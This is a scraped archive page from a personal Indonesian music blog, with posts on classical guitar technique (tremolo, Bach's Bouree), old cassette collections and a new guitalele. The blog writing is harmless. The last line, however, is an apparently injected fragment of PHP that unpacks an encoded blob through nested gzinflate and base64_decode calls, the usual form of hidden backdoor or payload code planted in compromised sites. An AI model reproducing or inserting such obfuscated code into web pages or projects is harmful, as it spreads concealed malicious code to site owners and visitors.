Delicious

Archives

Categories

Archive for 'Musik' Category





« »

LiveStream Gitaran Sore @ Cirebon

  ozzie / 02/12/2012

Cirebon, 1 Des 2012
melepas rutinitas coding, scripting, monitoring.. watching & recording..




some extreme..

  ozzie / 10/08/2012

Research & Development

  ozzie / 09/07/2012

weekly activites

  ozzie / 05/07/2012

Back To December

  ozzie / 02/06/2011

this is about you ..



  ozzie / 26/04/2011

Lancarin Tremolo

  ozzie / 17/06/2008

Biar lancar maen keyboard di Shell apalagi dituntut maen cepet di console saat meng-configure rule dan policy routing 8-}8-}8-} maka dari pada itu harus belajar Tremolo ;));));))

kebetulan nemu karya nya om Carcassi di google :D:D
(Etude Opus 60. No.7). =p~=p~
M. Carcassi

Tremolo sendiri ampir sama kayak Tuplet ato triple di drum :D.. tapi notasi Tuplet nada dengan ketukan yang sama… :-s.. kalo teknik Tremolo di Classical Guitar.. di maenin(dipetik) dengan ketukan yang sama #:-s#:-s.. metik nya pun pake 3 jari #-o#-o.. mana di senar yg sama;));)).. nyangkut dah tuh 8-}8-}8-}..

dalem Classical Guitar Technique… notasi Tremolo di tulis dengan bagian jari (p,i,m,a)

p = thumb / jempol
i = index / telunjuk
m = middle / jari tengah
a = ring finger / jari manis

jadi urutannya sekali metik = jari manis, jari tengah, jari telunjuk (p,a,m,i) ;))

diaantara banyak aransmen yang pake teknik tremolo… Recuerdos de la Alhambra karya om Tarrega lumayan paling tenar 8->8->

ni nemu video orang maen Recuerdos de la Alhambra di Youtube: http://www.youtube.com/watch?v=AIzKsNIRrV4 ;));));))

moga-moga makin lancar di Shell ama CLI

[-o<[-o<[-o<[-o< amiinnnnn



Bongkar

  ozzie / 13/03/2008

Menjelang acara beres-beres kamar bareng anu-ku :">:">.. sambil nyiapin tool, koran bekas, tissue, kain lap, kain pel, sapu, vacum cleaner ama garem ikan ;));)) sekalian akuarium udah be-jamur 8-}.. gak lupa ganti sprey \:d/\:d/

targetnya sih.. gitar-gitar harus di beresin ;)) kotak di pojok harus di keluarin:-s:-s.. iyahh… di keluarin dulu atuh isinya say:">… sembari nunggu event nya sembari bongkar isinya.. gak taunya isinya kaset-kaset lama jaman sekolah 8-}8-}.. sekalian flashback ;));))

Tapi sayang..:-< udah banyak yg ilang + rusak koleksinya =((.. diantara koleksi local ama internasional jaman TrashMetal, HeavyMetal, SpeedMetal, Classical lokal jaman godbless, ROXX, rajawali, powermetal dll… dan ada sisa 1 album edane langsung dari om eet sjahrani (gitaris EdanE ;));)) lengkap tanda tangan mereka.. \:d/ tapi sayang mereka salah nulis nama gue #-o.. harusnya ozzie malah di tulis oji :((:((:((…..

berhubung teknologinya udah liwat:-s.. jadi jarang denger kaset ;)) palingan sekarang kalo dengerin via streaming ;)).. 8-}8-} ..

btw…mao di oper kemanah nih kaset-kaset nya say? :-s.. palingan masup gudang bareng komputer jaman EGA, CGA, yg slotnya masih ISA :-<:-<:-<:-<



My New Hair..

  ozzie / 17/10/2007

Keasikan nongkrong lagih ;));)) begadang di pinggir jalan 8-}8-}
Nge-Gimbal-in rambut mumpung udah panjang \:d/\:d/\:d/
Rambut baru Abis lebaran <:-p<:-p<:-p<:-p<:-p

Ozzienich

Mo liat Koleksi Rambut Ozzie ??? ;;);;)

Makasih buat semua yg nongkrong di Ex. Studio ASA & warnet GAMMA ;));)) ;)

 

* No Matter what they Say!! :-":-":-"
Gak Suka?? :>:>:> Lo Siape??? 8-}8-}8-} Berantem yuk? >:/>:/>:/



Bouree

  ozzie / 25/09/2007

Sekedar mutholaah, sharing ;)) dan sekalian Iseng2 belajar nge-review :"> sembari dengerin sebelon Tidur. :D

bouree

Bouree

FYI: http://www.musicaviva.com/guitar/music.tpl?filnavn=bwv0996-5-gtr2

Bouree ( BWV 0996 ) sebuah komposisi karya J.S Bach yang banyak dibawakan oleh para musisi seperti John Williams hingga fluet-nya om Ian Anderson dari Jethro Tull dan para player nubi seperti sayah.:">

Kebetulan komposisi diatas untuk konsumsi Classical Guitar.. dengan sebuah Kres pada F, Sehingga semua nada F menjadi naik setengah oktaf (Fis). kecuali pada bar 20 yang terdapat tanda netral yang menjadi F. dan pengulangan 2 kali pada bar 9 dan 25. dengan tempo yang relatif cepat dengan ber-bendera satu :D atau sekitar 1/2 ketuk. ;));)) pegel-pegel dah! 8-}8-}8-}

inih pak, bu, om, tante, mbak, abang, kak, dik 8-} ada sample nya dalam format midi :D
ato mo liat sample lagunya di http://www.youtube.com/watch?v=hqG5C4bMcKc
selamat menikmati <:-p<:-p<:-p 8-}8-}8-}



Six-Degrees

  ozzie / 09/09/2007

6 Penyakit Mental 8-} 8-} .. Untuk lebih jelasnya bisa Kupas di WIKI ;));))

dengan durasi 42 Menit 8->8->

DT
Akhir kata: ;));))
A journey to find The answers inside Our illusive mind. \:d/\:d/

“Understanding the mentally different will make us more aware, and more eager to help out.”
http://www.psychcentral.com/



Flashback

  ozzie / 31/07/2007

Sekedar Flashback. mengulang biar gak lupa :">.. sekalian buat yang mo belajar :D:D
Basic

Gambar diatas cuma cara nerjemahin notasi ke gitar ;));)).. yang terdiri dari 3 oktaf yang dimulai dari E. dari nada rendah (E senar 6 ampe E senar 4) | [yang label warna merah].. sebenernya mo di terusin ke freet 12 juga gak pa-pa;));)).. buat nada sedang dari E senar 4 ampe E senar 1.. dan buat nada tinggi dari E senar 1 Freet 0 ampe freet 12.. :">:">

Ketukan

- Not Penuh : 4 Ketuk 4
- Not Penuh : 2 Ketuk 4
- Not Penuh : 1 Ketuk 4
- Not Penuh : 1/2 Ketuk 4
- Not Penuh : 1/4 Ketuk 4

mungkin seginih dulu.. :">:">.. semoga bermanfaat [-o< ;)



Protected: Alih Profesi…

  ozzie / 09/07/2007

This post is password protected. To view it please enter your password below:



Protected: LCD laptop-ku.

  ozzie / 11/12/2006

This post is password protected. To view it please enter your password below:



Winter Carols…

  ozzie / 26/11/2006

Udah keluar =p~ Blackmore’s Night album: Winter Carols, cek aja… http://www.blackmoresnight.com/. :D



Guitalele…

  ozzie / 17/08/2006

Setelah lama tidak bermain gitar dikarenakan sibuk kerja+kuliah dan kondisi semua gitar sudah memperihatinkan, ada yang neck-nya patah, pecah, suaranya gak jelas :( akhirnya ozzie membeli gitar baru :D Yamaha seri GL-1 untuk menambah koleksi gitar dan semakin semangat main classical guitar-nya. :D
GL-1
Tapi sayang posisinya terlalu dekat dan sempit :( harus adaptasi dulu, maklum udah lama gak pegang gitar :D untuk tempo yang lambat sih masih dapet seperti Cavatina :D tapi kalo yang dinamik + tempo nya cepet seperti Canarios, Asturias, Bouree AMPUN :(( apalagi Recuerdos de la Alhambra…..

sekalian untuk menemani monitoring trafic dan me-Ngoprek Linux + BSD di kamar :D apalagi kalo nungguin compile kernel. :D



Gitar Ku

  ozzie / 22/12/2005

Sejak rutin kerja gitar-ku gak pernah di pegang-pegang lagi, padahal senar 4 masih sisa -/+ 47 Meter lagi dengan diameter 1 mm, maklum senar nylon:x



".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>